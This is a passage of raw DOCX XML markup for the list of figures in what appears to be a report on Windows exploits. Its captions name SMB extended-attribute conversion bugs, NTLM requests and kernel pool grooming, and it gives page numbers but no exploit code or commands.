            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981740 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C6CB8D5" w14:textId="1D0FDC3D"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41" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16: .rtf file opening the exploit [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981741 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71FBCCDF" w14:textId="5F983F70"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42" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17: Example of a File Extended Attribute [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981742 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63EF6CD6" w14:textId="55614B26"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43" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18: Logic of Srv0s2FeaListToNt Function [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981743 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="732F483F" w14:textId="0435AE65"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44" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19: Logic of Size Calculation of conversion between 0s2FeaList and NtFeaList Structures [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981744 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77F39869" w14:textId="5573379B"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45" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20: Conversion Values of 0s2FeaList to NtFeaList with and without Bug [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981745 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>32</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="572AFA57" w14:textId="03452A53"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46" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21: SMB Packet Before Shrinkage [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981746 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26D2C1BC" w14:textId="2527AA68"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47" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22: SizeOfListInBytes after shrinkage below 2</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t xml:space="preserve">16 </w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981747 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E5F12DF" w14:textId="7551ECAF"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48" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 23: SizeOfListInBytes after shrinkage above 2</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t xml:space="preserve">16 </w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981748 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20640374" w14:textId="7643B27D"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49" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 24: Example of Wrong Parsing Bug [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981749 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37E53828" w14:textId="4B355570"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50" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 25: LM and NTLM Authentication SMB request [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981750 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FA82727" w14:textId="35BF1F1E"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51" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 26: NTLMv2 Authentication SMB request [40]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981751 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20F2EE18" w14:textId="6F19EE9E"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52" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 27: Initial state of HAL's Heap non-paged kernel pool</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981752 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22A4C9FD" w14:textId="5939E14B"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53" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 28: Only Os2Fea transmission open</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981753 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26E5BC63" w14:textId="3138E59A"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54" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 29: Part of Os2Fea has been filled</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981754 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5678F4C2" w14:textId="4C488C08"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55" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 30: Multiple srvnet connections are opened</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981755 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7952ABA9" w14:textId="6BBA0BF0"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56" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 31: Bug C creating placeholder</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981756 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="739075E4" w14:textId="62DE41CD"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57" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 32: New srvnet allocation</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981757 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0807A3A4" w14:textId="2855F362"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58" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Figure 33: Bug C chunk is freed</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981758 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="281D8F24" w14:textId="71F66EAB"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59" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
